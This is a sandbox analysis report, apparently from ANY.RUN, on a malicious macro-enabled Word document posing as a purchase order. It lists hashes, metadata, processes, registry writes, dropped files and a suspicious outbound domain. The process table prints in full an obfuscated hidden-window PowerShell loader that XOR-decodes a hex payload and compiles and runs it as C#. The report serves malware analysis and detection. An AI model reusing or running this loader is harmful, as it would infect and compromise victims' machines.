| File name: | REQ04176 ORDER.doc |
| Full analysis: | https://app.any.run/tasks/520b6360-9e49-442a-a69b-02c5ccecd020 |
| Verdict: | Malicious activity |
| Analysis date: | November 29, 2020, 21:05:04 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info: | Microsoft Word 2007+ |
| MD5: | 66B841118B629B4DFB9BD7284BD0F56D |
| SHA1: | 98D7996914D5C2A24CCA8BE185536CC18B32EAE8 |
| SHA256: | 50C0E0196C71FF872DFA2745CFECCB82BB1FEF300EDF4B78EF918FC6049D2E54 |
| SSDEEP: | 384:/imtnzmvSgZVAhmmC78Oje4L+E8cyd21pLbVHir:/LzmvSgfz84vTys1FVCr |
| .docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
|---|---|---|
| .docx | | | Word Microsoft Office Open XML Format document (24.2) |
| .zip | | | Open Packaging Conventions container (18) |
| .zip | | | ZIP compressed archive (4.1) |
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0006 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:01:01 00:00:00 |
| ZipCRC: | 0x7aec387e |
| ZipCompressedSize: | 391 |
| ZipUncompressedSize: | 1453 |
| ZipFileName: | [Content_Types].xml |
| Template: | Normal.dotm |
|---|---|
| TotalEditTime: | - |
| Pages: | 1 |
| Words: | - |
| Characters: | - |
| Application: | Microsoft Office Word |
| DocSecurity: | None |
| Lines: | - |
| Paragraphs: | - |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| CharactersWithSpaces: | - |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| AppVersion: | 16 |
| Keywords: | Donga |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| CreateDate: | 2020:11:27 08:46:00Z |
| ModifyDate: | 2020:11:27 08:46:00Z |
| Title: | NoNcoNversaNt |
|---|---|
| Subject: | Charterless |
| Creator: | - |
| Description: | Comtism |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2404 | powershell -WindowStyle Hidden function wdd89c7 {param($t75f23a)$v7377ac='l9d6f1c';$f53c43c='';for ($i=0; $i -lt $t75f23a.length;$i+=2){$lc45c53=[convert]::ToByte($t75f23a.Substring($i,2),16);$f53c43c+=[char]($lc45c53 -bxor $v7377ac[($i/2)%$v7377ac.length]);}return $f53c43c;} $a6cc75 = '194a0d58011130154a10530b0a161f500a5146621a1f4d015b486316024d0d5b031f2a024d0144094130094b125f055410574c175f0856433f401742035c4d28500551085e10185007455d441005570316354810185c09182f7e58194a0d58011130154a10530b1f2d094d5f3b6c41160e550d5546520f0d4a17161006515f5c500f1d6a2700552d5b165e111811465d03430d09555704441d26024d164f365e0a024d59142154173c4b0b552755071e5c174544183e1c4c065a0f52431f4d05420f524309411053145f4325571066124343155a520303054b255710661243430a08055355094f1f4d165f0856430b0f570452000245023f720a5d2a01490b44121941075c1658035d505e1b487308451115690b5f08455e4e750b57027d0a0e4b05441f134a314911540a58004c4a10571258004c5c1c4203430d4c700a423645114c4f07545557060811174214580d0b1913540306560a0c4d0d3d750f00700946094317441b0f53145f06000a56144a740d184b1d6609580d180446600f431719580866145e17095a10144f6c13195b085f0511101858105f051106144d0144081101035608160002025f004c7f084533184b445d5206020e0e011a33780d186910444646560d0a061a13580d181915075e04064056114246440a024d445e5104555a105f6d225d0f2554145914454b4e72014408540f5f0b4a520a5d41407c0a4214483303500a425b13311855295910542e09540b441f134f3f5c107a074217294b1659140c050d5517534f6c101858105f051106144d01440811150350001604075a0d0d02504e780d186910444642570a0b5d014a780d18691044464b06580c5c1a0f5f174c5d560254094a574911540a58004c4a10571258004c500a42465e005a0d560f07194a17700a423645114c41515554045609041255040205095d4c4102555b555a531e440107590d5501535757540c51060001534e104d0d0f574b140c07045304064d042d581261171e173e53145e4a17700a423645114c4b56015f535b51400700535457444151555404560915135202095a0f0e4c1454555658085303000256590b54045603540e085503560153590d550744184a5750021e140354555b5c175b780d18691044486b061e564d4d33780d18691044465d54590f5c0f5b19362557106612434a5902115f0845431d08020e5f0c535750021e0002025f004c4454065a0e01485a510455540048061e0553405611424640520a015d1f4f4a21154d016d3b1112090e5550510c185c4157074a011b0a5f48061e085311022d581261171e190707000450517405441559020017255a0a5e00247e085904500f440a4d0d2b50111f51055a48720c1c404c470306520a0e48064a52520a0c571a5518580e0f5d575257054457014146780d186910444e43515b00060e48650c2557100052194a47091c0656000145150707000450400a4d0d1b4c1e1f4d165f085643060e530154035e2957125f145e0d015c0a42487606187f0b5a0254113c58105e4e740d1a501659085c06024d4a6516540005580870095d07094b4a7716410f055a05420f5e0d285810574f11484c1b386a1407550a5b5d14461a431b5d000e5f5254441b50045352520f0c57144f0a0d094e44610353200050015812194a427d0b41085d0c0d5d225f0a544b1b5d000e5f5254441b54025255525c0d5207530101585a50055255535d0d55035401565c0c540f5655565c0c5403540156590e510e5655565d095603550157585d54545353570d0c5c06550556585a5404500953540c05065107015e5b5155510151080e51050304505c0855005706535d0d010655134a40535301510351450234440952061f4a3742074317255702594648000e005500520c0d094e4466145e00094a176512501118700a500919095b0e53045418583c4b0b55034210426a105714454b155a060f570757450216531244110219540d1b41160e550d554642170d4d0d554642171e500a5146460708015d55511910184b0d5801110c0f0f050352074a174a10440f5f044c5f555703025b511b080f0207055d5a460d154511055703161052015f5f01525b1341575f0b444e580d18190d0b560a4305050b55505056580f4a7a035f0418515f5f4d0c514542064f125443155a520303055e2f560a40034317426d0b741f4506445607000704575a1737430442171e500a514e584f5e1048075018581a5a060500540747044c550e501145111d555004065867020707545054624c5f49034a495f555703025b4275015801450b31105f4b145417194b0a161052015f5f01525d4c1e'; $a6cc752 = wdd89c7($a6cc75); Add-Type -TypeDefinition $a6cc752; [v723e49]::oc6429a(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\REQ04176 ORDER.doc.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2812 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB754.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB753.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) Modules
| |||||||||||||||
| 3004 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\uzenhcki.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | !2 |
Value: 213220008C0A0000010000000000000000000000 | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (2700) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: Off | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAA91.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2404 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDFEYLK52E6DLIMX70WB.temp | — | |
MD5:— | SHA256:— | |||
| 2812 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB754.tmp | — | |
MD5:— | SHA256:— | |||
| 3004 | csc.exe | C:\Users\admin\AppData\Local\Temp\uzenhcki.dll | — | |
MD5:— | SHA256:— | |||
| 3004 | csc.exe | C:\Users\admin\AppData\Local\Temp\uzenhcki.out | — | |
MD5:— | SHA256:— | |||
| 3004 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB753.tmp | res | |
MD5:— | SHA256:— | |||
| 2404 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 3004 | csc.exe | C:\Users\admin\AppData\Local\Temp\uzenhcki.pdb | pdb | |
MD5:— | SHA256:— | |||
| 2404 | powershell.exe | C:\Users\admin\AppData\Local\Temp\uzenhcki.cmdline | text | |
MD5:— | SHA256:— | |||
| 2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$Q04176 ORDER.doc.docm | pgc | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2404 | powershell.exe | 104.129.25.9:443 | tew44fe44f444445455.gb.net | QuadraNet, Inc | US | suspicious |
Domain | IP | Reputation |
|---|---|---|
tew44fe44f444445455.gb.net |
| suspicious |
Process | Message |
|---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|